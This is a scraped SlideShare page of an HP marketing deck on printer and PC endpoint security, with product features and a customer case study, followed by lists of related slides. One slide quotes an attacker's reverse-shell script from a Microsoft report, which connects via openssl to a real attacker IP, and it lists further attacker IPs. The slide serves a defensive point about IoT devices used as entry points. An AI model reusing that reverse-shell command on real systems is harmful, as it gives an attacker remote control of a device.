SlideShare a Scribd company logo
c04912106, May 2019, Rev. 141
Transform Endpoint
Security with the World’s
Most Secure PCs and
Printers
Jacky Cheung
Market Development Manager
Jan 13, 2020
Get the world’s most secure PCs and
Printers
PROXY &
FIREWALL
CONTROLS
(SITE
CATEGORIZATION,
SSL INSPECTION,
CONTENT ANALYSIS)
CLOUD
CONTROLS
(CASB,
CLOUD AV)
NETWORK
CONTROLS
(NETWORK AV,
SANDBOXING,
SECURITY
ANALYTICS)
HOST
CONTROLS
(ENDPOINT AV,
APPLICATION
WHITELISTING, EDR)
ON THE
ENDPOINT
ON THE
NETWORK
ENTERING
THE
NETWORK
OUTSIDE
THE
NETWORK
HP PCs and Printers
are engineered with
hardened security
features to protect and
recover from
cyberattacks before they
become headlines.
Where we Play
Last line of Defense
Firmware
and software
Email
Hardware
Internet
Network
access
• Print infrastructure is
now viewed as one
of the top security
risks by
organizations*
Today’s printers act a whole lot like PCs
c04912106, March 2019, Rev. 13
Perceived Level of Security Risk
Page 5: Printer Security : The New IT Imperative, Research Shows That the “Humble Printer”, Remains a Security Blind Spot4
MFP Security Vulnerabilities
Page 7, Global Print Security Landscape, 2019 , Quocirca5
Microsoft’s Threat Intelligence
Report – August 2019
c04912106, May 2019, Rev. 146
IoT Devices ( Printers, VOIP Phone,
DVRs) are being used as entry
points into the corporate networks
#!/bin/sh
export [IOT Device] ="-qws-display :1 -nomouse"
echo 1|tee /tmp/.c;sh-c '(until (sh-c "openssls_client-quiet -host
167.114.153.55 -port 443 |while : ; do sh&& break; done|
openssls_client-quiet -host 167.114.153.55 -port 443"); do
(sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee/tmp.c&&
if [ $cn-ge30 ]; then (rm /tmp/.c;pkill-f 'openssl'); fi);done)&' &
--end contents of file—
• 167.114.153.55, 94.237.37.28, 82.118.242.171,
31.220.61.251, 128.199.199.187
• https://msrc-
blog.microsoft.com/2019/08/05/corporate-iot-a-path-
to-intrusion
c04912106, May 2019, Rev. 147
 IT Asset Management
 Custom security policy
 Anti-Malware / OS Security
 Patching
 Hardening, Secure Configuration
 Network security (802.1x,
Internet Exposure etc)
 Reports (Audits, Compliance
reports)
 3rdParty contracts
Call to Action -Recommendations from
Microsoft and OEMs
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
 Monitors outbound network connections (packets)
 Detects anomalous network behavior
 Learns what’s normal, then inspects and stops
suspicious packets
 User-defined DNS whitelist
 Monitors DNS activity to detect attempts to contact
Command & Control server
 Triggers a reboot to initiate self-healing procedures
without IT intervention
 Creates security events that can be integrated with a
SIEM,
Anti-malware technology in HP Printers
/ MFDs
HP Printer / MFD Security Dashboard
9
HP SURE START1 HP SURE RUN2 HP SURE RECOVER3 HP SURE CLICK4 HP SURE VIEW5
The world’s first
SELF-HEALING BIOS
Others can detect, but
HP Sure Start can
RECOVER!
Built-in
HARDWARE-
ENFORCED
RUNTIME
PERSISTENCE
for your
PC's key security
processes
SECURE AND
AUTOMATED
RECOVERY
on the world’s first and
only PCs with a
firmware-embedded
self-healing system
image28
SECURE WEB
BROWSING
to protect against
most common
attack methods
and attachment
viewing
Protect against
INTEGRATED
PRIVACY
SCREEN6
UNIQUE HARDWARE - UNMATCHED
PROTECTION
HARDWARE-ENFORCED RESILIENCE AGAINST…
BIOS Rootkits
like
LoJax
Viruses that take down OS
defenses like
H1N1
Wiper attacks
like
NotPetya
Web-borne or Office
malware like
WannaCry
Shoulder surfing
and
Visual
Hacking
HP Proactive Security plans
11
DaaS Proactive Security features
√
Real-time malware threat protection:
• Email attachment protection
• Phishing link protection
• Download protection
• Corporate website whitelisting support
for IT
√
HP TechPulse reporting and analytics:
• Protection status and gaps by time
• Most impacted users and devices by
prevented threats
• Threats by type and source
(summary/details), and over time
Standard
Self-
Managed
Enhanced
HP-
Managed
√ √
HP-managed service:
• Analysis of threats by Service Experts⁴
• Detailed, malware kill chain analysis²⁷
• Enforcement of isolation protection on
endpoints
√
Purchasers of HP DaaS Proactive Security¹ in the U.S receive the Aon CyQu self-assessment and security score. $0 retainer and one-hour
consultation included with optional incident response services from Aon. HP onboarding service representatives will provide instructions.
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
Case Study
Sydney TAFE closes security gaps across 1,000 – strong print estate
Challenge
With printers/MFPs becoming increasingly connected to the
network, there are risks to students’ personal information
and confidential staff information being leaked
The Australian Department of Defense identified printers
and MFPs as a potential source of cybersecurity incidents
Solution
HP delivered a Print Security Advisory Service. A three-
day risk assessment
The workshop helps discover security blind spots and
inefficiencies across Sydney TAFE’s printing and imaging
fleet
The workshop educated key stakeholders on threats and
helping Sydney TAFE reach consensus on the goals of a
new printing security strategy
1Includes device, data and document security capabilities by leading managed print service providers. Based on HP review of 2015-2016 publicly available information on security services,
security and management software and device embedded security features of their competitive in-class printers. For more information visit: www.hp.com/go/MPSsecurityclaims or
www.hp.com/go/mps.
Key Take Away
c04912106, May 2019, Rev. 1414
Should you have any further
Questions, please feel free to
Contact :
Jacky Cheung
Market Development Manager
HP Inc Hong Kong Limited
TEL : 852 60740307
Email : jacky.cheung@hp.com
THANK YOU
Ad

More Related Content

What's hot (20)

Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
Lancope, Inc.
 
Information security policy
Information security policyInformation security policy
Information security policy
BalachanderThilakar1
 
Securing your presence at the perimeter
Securing your presence at the perimeterSecuring your presence at the perimeter
Securing your presence at the perimeter
Ben Rothke
 
5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses
Wilkins Consulting, LLC
 
Cyber Security 4.0 conference 30 November 2016
Cyber Security 4.0 conference 30 November 2016Cyber Security 4.0 conference 30 November 2016
Cyber Security 4.0 conference 30 November 2016
InfinIT - Innovationsnetværket for it
 
Start With A Great Information Security Plan!
Start With A Great Information Security Plan!Start With A Great Information Security Plan!
Start With A Great Information Security Plan!
Tammy Clark
 
PACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless AttacksPACE-IT, Security+3.4: Summary of Wireless Attacks
PACE-IT, Security+3.4: Summary of Wireless Attacks
Pace IT at Edmonds Community College
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
CommLab India – Rapid eLearning Solutions
 
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex TrainingCybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Bryan Len
 
Security tools
Security toolsSecurity tools
Security tools
arfan shahzad
 
IT & Network Security Awareness
IT & Network Security AwarenessIT & Network Security Awareness
IT & Network Security Awareness
The Network Support Company
 
IT Security and Risk Mitigation
IT Security and Risk MitigationIT Security and Risk Mitigation
IT Security and Risk Mitigation
Mukalele Rogers
 
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
Ivanti
 
Third party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaireThird party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaire
Priyanka Aash
 
Info Sec2007 End Point Final
Info Sec2007   End Point FinalInfo Sec2007   End Point Final
Info Sec2007 End Point Final
Ben Rothke
 
Topic11
Topic11Topic11
Topic11
Anne Starr
 
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
Robert Straus
 
SEC440: Incident Response Plan
SEC440: Incident Response PlanSEC440: Incident Response Plan
SEC440: Incident Response Plan
Thomas Christopher Ty
 
Rothke rsa 2013 - the five habits of highly secure organizations
Rothke   rsa 2013 - the five habits of highly secure organizationsRothke   rsa 2013 - the five habits of highly secure organizations
Rothke rsa 2013 - the five habits of highly secure organizations
Ben Rothke
 
Module0&1 intro-foundations-b
Module0&1 intro-foundations-bModule0&1 intro-foundations-b
Module0&1 intro-foundations-b
BbAOC
 
Needs of a Modern Incident Response Program
Needs of a Modern Incident Response ProgramNeeds of a Modern Incident Response Program
Needs of a Modern Incident Response Program
Lancope, Inc.
 
Securing your presence at the perimeter
Securing your presence at the perimeterSecuring your presence at the perimeter
Securing your presence at the perimeter
Ben Rothke
 
5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses5 Step Data Security Plan for Small Businesses
5 Step Data Security Plan for Small Businesses
Wilkins Consulting, LLC
 
Start With A Great Information Security Plan!
Start With A Great Information Security Plan!Start With A Great Information Security Plan!
Start With A Great Information Security Plan!
Tammy Clark
 
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex TrainingCybersecurity Training Seminars, 44 Courses : Tonex Training
Cybersecurity Training Seminars, 44 Courses : Tonex Training
Bryan Len
 
IT Security and Risk Mitigation
IT Security and Risk MitigationIT Security and Risk Mitigation
IT Security and Risk Mitigation
Mukalele Rogers
 
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...Cybersecurity Insiders Webinar  - Zero Trust: Best Practices for Securing the...
Cybersecurity Insiders Webinar - Zero Trust: Best Practices for Securing the...
Ivanti
 
Third party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaireThird party datasecurity assurance questionnaire
Third party datasecurity assurance questionnaire
Priyanka Aash
 
Info Sec2007 End Point Final
Info Sec2007   End Point FinalInfo Sec2007   End Point Final
Info Sec2007 End Point Final
Ben Rothke
 
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
CyberSec First Responder: Incident Response & Threat Analysis // CyberSAFE: S...
Robert Straus
 
Rothke rsa 2013 - the five habits of highly secure organizations
Rothke   rsa 2013 - the five habits of highly secure organizationsRothke   rsa 2013 - the five habits of highly secure organizations
Rothke rsa 2013 - the five habits of highly secure organizations
Ben Rothke
 
Module0&1 intro-foundations-b
Module0&1 intro-foundations-bModule0&1 intro-foundations-b
Module0&1 intro-foundations-b
BbAOC
 

Similar to 08 Transform Endpoint Security with the World’s Most Secure PCs and Printers (20)

Think Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your PrintersThink Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your Printers
scoopnewsgroup
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
raneegirshls
 
Retail
RetailRetail
Retail
Dorothy Anne Almirez
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
moedafobil
 
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
Canon Business CEE
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
qarootmantyi
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
cuddietheresa
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
salmonpybus
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environments
amiable_indian
 
MBM Security Products Matrix
MBM Security Products MatrixMBM Security Products Matrix
MBM Security Products Matrix
MBMeHealthCareSolutions
 
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
MohamedOmerMusa
 
amrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdfamrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdf
amrapalibuildersreviews
 
Vulnerability Management
Vulnerability ManagementVulnerability Management
Vulnerability Management
GFI Software
 
Security assessment with a hint of CISSP Prep
Security assessment with a hint of CISSP PrepSecurity assessment with a hint of CISSP Prep
Security assessment with a hint of CISSP Prep
EnterpriseGRC Solutions, Inc.
 
The Insider Threats - Are You at Risk?
The Insider Threats - Are You at Risk?The Insider Threats - Are You at Risk?
The Insider Threats - Are You at Risk?
Fuji Xerox Asia Pacific
 
Ransomware Prevention Guide
Ransomware Prevention GuideRansomware Prevention Guide
Ransomware Prevention Guide
Brian Honan
 
Beyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus securityBeyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus security
UltraUploader
 
Drivelock modern approach of it security & amp; encryption solution -whitep...
Drivelock   modern approach of it security & amp; encryption solution -whitep...Drivelock   modern approach of it security & amp; encryption solution -whitep...
Drivelock modern approach of it security & amp; encryption solution -whitep...
Arbp Worldwide
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
GFI Software
 
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docxMeltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
roushhsiu
 
Think Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your PrintersThink Your Network Is Safe? Check Your Printers
Think Your Network Is Safe? Check Your Printers
scoopnewsgroup
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
raneegirshls
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
moedafobil
 
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
8 WAYS TO PROTECT THE DATA IN YOUR OFFICE: #3 Trust in your office solutions
Canon Business CEE
 
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
HP Non Stop Server Security A Practical Handbook 1st Edition Terri Hill And E...
qarootmantyi
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
cuddietheresa
 
Discuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docxDiscuss how a successful organization should have the followin.docx
Discuss how a successful organization should have the followin.docx
salmonpybus
 
Security Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA EnvironmentsSecurity Considerations in Process Control and SCADA Environments
Security Considerations in Process Control and SCADA Environments
amiable_indian
 
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
MohamedOmerMusa
 
amrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdfamrapali builders @@hacking printers.pdf
amrapali builders @@hacking printers.pdf
amrapalibuildersreviews
 
Vulnerability Management
Vulnerability ManagementVulnerability Management
Vulnerability Management
GFI Software
 
Ransomware Prevention Guide
Ransomware Prevention GuideRansomware Prevention Guide
Ransomware Prevention Guide
Brian Honan
 
Beyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus securityBeyond layers and peripheral antivirus security
Beyond layers and peripheral antivirus security
UltraUploader
 
Drivelock modern approach of it security & amp; encryption solution -whitep...
Drivelock   modern approach of it security & amp; encryption solution -whitep...Drivelock   modern approach of it security & amp; encryption solution -whitep...
Drivelock modern approach of it security & amp; encryption solution -whitep...
Arbp Worldwide
 
Prevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability ScannerPrevent Getting Hacked by Using a Network Vulnerability Scanner
Prevent Getting Hacked by Using a Network Vulnerability Scanner
GFI Software
 
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docxMeltdown and Spectre Haunt the World’s Computers”In early Janua.docx
Meltdown and Spectre Haunt the World’s Computers”In early Janua.docx
roushhsiu
 
Ad

More from eLearning Consortium 電子學習聯盟 (20)

AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
eLearning Consortium 電子學習聯盟
 
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
eLearning Consortium 電子學習聯盟
 
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
2. How Data Analytics Transforming Digital Marketing - Ralph Szeto.pdf
eLearning Consortium 電子學習聯盟
 
1. How Data Analytics Transforming Digital Marketing - Saron Leung
1. How Data Analytics Transforming Digital Marketing - Saron Leung1. How Data Analytics Transforming Digital Marketing - Saron Leung
1. How Data Analytics Transforming Digital Marketing - Saron Leung
eLearning Consortium 電子學習聯盟
 
HKTVMall: Leading Technology Evolution for eCommerce Industry
HKTVMall: Leading Technology Evolution for eCommerce IndustryHKTVMall: Leading Technology Evolution for eCommerce Industry
HKTVMall: Leading Technology Evolution for eCommerce Industry
eLearning Consortium 電子學習聯盟
 
How Blockchain affecting us - Dr Sin.pdf
How Blockchain affecting us - Dr Sin.pdfHow Blockchain affecting us - Dr Sin.pdf
How Blockchain affecting us - Dr Sin.pdf
eLearning Consortium 電子學習聯盟
 
5-Hot-Chain Bento.pdf
5-Hot-Chain Bento.pdf5-Hot-Chain Bento.pdf
5-Hot-Chain Bento.pdf
eLearning Consortium 電子學習聯盟
 
4-Herbal ID.pdf
4-Herbal ID.pdf4-Herbal ID.pdf
4-Herbal ID.pdf
eLearning Consortium 電子學習聯盟
 
3-VisualSonic.pdf
3-VisualSonic.pdf3-VisualSonic.pdf
3-VisualSonic.pdf
eLearning Consortium 電子學習聯盟
 
2-kNOw Touch.pdf
2-kNOw Touch.pdf2-kNOw Touch.pdf
2-kNOw Touch.pdf
eLearning Consortium 電子學習聯盟
 
1-C-POLAR Air Filter.pdf
1-C-POLAR Air Filter.pdf1-C-POLAR Air Filter.pdf
1-C-POLAR Air Filter.pdf
eLearning Consortium 電子學習聯盟
 
3 - Interaction between Cyber Security and School IT Policy .pdf
3 - Interaction between Cyber Security and School IT Policy .pdf3 - Interaction between Cyber Security and School IT Policy .pdf
3 - Interaction between Cyber Security and School IT Policy .pdf
eLearning Consortium 電子學習聯盟
 
2 - ELC學校網絡安全與防護.pdf
2 - ELC學校網絡安全與防護.pdf2 - ELC學校網絡安全與防護.pdf
2 - ELC學校網絡安全與防護.pdf
eLearning Consortium 電子學習聯盟
 
1 - HKT Reporting.pdf
1 - HKT Reporting.pdf1 - HKT Reporting.pdf
1 - HKT Reporting.pdf
eLearning Consortium 電子學習聯盟
 
07 2020 網絡安全趨勢和安全小貼士
07 2020 網絡安全趨勢和安全小貼士07 2020 網絡安全趨勢和安全小貼士
07 2020 網絡安全趨勢和安全小貼士
eLearning Consortium 電子學習聯盟
 
06 網絡安全挑戰與防衛
06 網絡安全挑戰與防衛06 網絡安全挑戰與防衛
06 網絡安全挑戰與防衛
eLearning Consortium 電子學習聯盟
 
04 提升網絡安全 - 為電子學習打造先決條件
04 提升網絡安全 - 為電子學習打造先決條件04 提升網絡安全 - 為電子學習打造先決條件
04 提升網絡安全 - 為電子學習打造先決條件
eLearning Consortium 電子學習聯盟
 
03 學校網絡安全與防衛
03 學校網絡安全與防衛03 學校網絡安全與防衛
03 學校網絡安全與防衛
eLearning Consortium 電子學習聯盟
 
Experience Sharing on School Pentest Project (Updated)
Experience Sharing on School Pentest Project (Updated)Experience Sharing on School Pentest Project (Updated)
Experience Sharing on School Pentest Project (Updated)
eLearning Consortium 電子學習聯盟
 
Security Incident Handling for Schools
Security Incident Handling for Schools Security Incident Handling for Schools
Security Incident Handling for Schools
eLearning Consortium 電子學習聯盟
 
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
AI生成工具的新衝擊 - MS Bing & Google Bard 能否挑戰ChatGPT-4領導地位
eLearning Consortium 電子學習聯盟
 
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
ChatGPT 顛覆傳統的科技創新 - 不僅文字工作者會被AI取代?
eLearning Consortium 電子學習聯盟
 
Ad

Recently uploaded (20)

One Hot encoding a revolution in Machine learning
One Hot encoding a revolution in Machine learningOne Hot encoding a revolution in Machine learning
One Hot encoding a revolution in Machine learning
momer9505
 
Metamorphosis: Life's Transformative Journey
Metamorphosis: Life's Transformative JourneyMetamorphosis: Life's Transformative Journey
Metamorphosis: Life's Transformative Journey
Arshad Shaikh
 
Introduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe EngineeringIntroduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe Engineering
Damian T. Gordon
 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
 
Operations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdfOperations Management (Dr. Abdulfatah Salem).pdf
Operations Management (Dr. Abdulfatah Salem).pdf
Arab Academy for Science, Technology and Maritime Transport
 
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
Kasdorf "Accessibility Essentials: A 2025 NISO Training Series, Session 5, Ac...
National Information Standards Organization (NISO)
 
2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx
contactwilliamm2546
 
apa-style-referencing-visual-guide-2025.pdf
apa-style-referencing-visual-guide-2025.pdfapa-style-referencing-visual-guide-2025.pdf
apa-style-referencing-visual-guide-2025.pdf
Ishika Ghosh
 
Grade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable WorksheetGrade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable Worksheet
Sritoma Majumder
 
"Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules""Basics of Heterocyclic Compounds and Their Naming Rules"
"Basics of Heterocyclic Compounds and Their Naming Rules"
rupalinirmalbpharm
 
Real GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for SuccessReal GitHub Copilot Exam Dumps for Success
Real GitHub Copilot Exam Dumps for Success
Mark Soia
 
Understanding P–N Junction Semiconductors: A Beginner’s Guide
Understanding P–N Junction Semiconductors: A Beginner’s GuideUnderstanding P–N Junction Semiconductors: A Beginner’s Guide
Understanding P–N Junction Semiconductors: A Beginner’s Guide
GS Virdi
 
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptxSCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
SCI BIZ TECH QUIZ (OPEN) PRELIMS XTASY 2025.pptx
Ronisha Das
 
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
World war-1(Causes & impacts at a glance) PPT by Simanchala Sarab(BABed,sem-4...
larencebapu132
 
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
BỘ ĐỀ TUYỂN SINH VÀO LỚP 10 TIẾNG ANH - 25 ĐỀ THI BÁM SÁT CẤU TRÚC MỚI NHẤT, ...
Nguyen Thanh Tu Collection
 
How to Manage Purchase Alternatives in Odoo 18
How to Manage Purchase Alternatives in Odoo 18How to Manage Purchase Alternatives in Odoo 18
How to Manage Purchase Alternatives in Odoo 18
Celine George
 
Odoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo SlidesOdoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo Slides
Celine George
 
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - WorksheetCBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
CBSE - Grade 8 - Science - Chemistry - Metals and Non Metals - Worksheet
Sritoma Majumder
 
03#UNTAGGED. Generosity in architecture.
03#UNTAGGED. Generosity in architecture.03#UNTAGGED. Generosity in architecture.
03#UNTAGGED. Generosity in architecture.
MCH
 
To study Digestive system of insect.pptx
To study Digestive system of insect.pptxTo study Digestive system of insect.pptx
To study Digestive system of insect.pptx
Arshad Shaikh
 
One Hot encoding a revolution in Machine learning
One Hot encoding a revolution in Machine learningOne Hot encoding a revolution in Machine learning
One Hot encoding a revolution in Machine learning
momer9505
 
Metamorphosis: Life's Transformative Journey
Metamorphosis: Life's Transformative JourneyMetamorphosis: Life's Transformative Journey
Metamorphosis: Life's Transformative Journey
Arshad Shaikh
 
Introduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe EngineeringIntroduction to Vibe Coding and Vibe Engineering
Introduction to Vibe Coding and Vibe Engineering
Damian T. Gordon
 
How to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POSHow to Manage Opening & Closing Controls in Odoo 17 POS
How to Manage Opening & Closing Controls in Odoo 17 POS
Celine George
 
2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx2541William_McCollough_DigitalDetox.docx
2541William_McCollough_DigitalDetox.docx
contactwilliamm2546
 
apa-style-referencing-visual-guide-2025.pdf
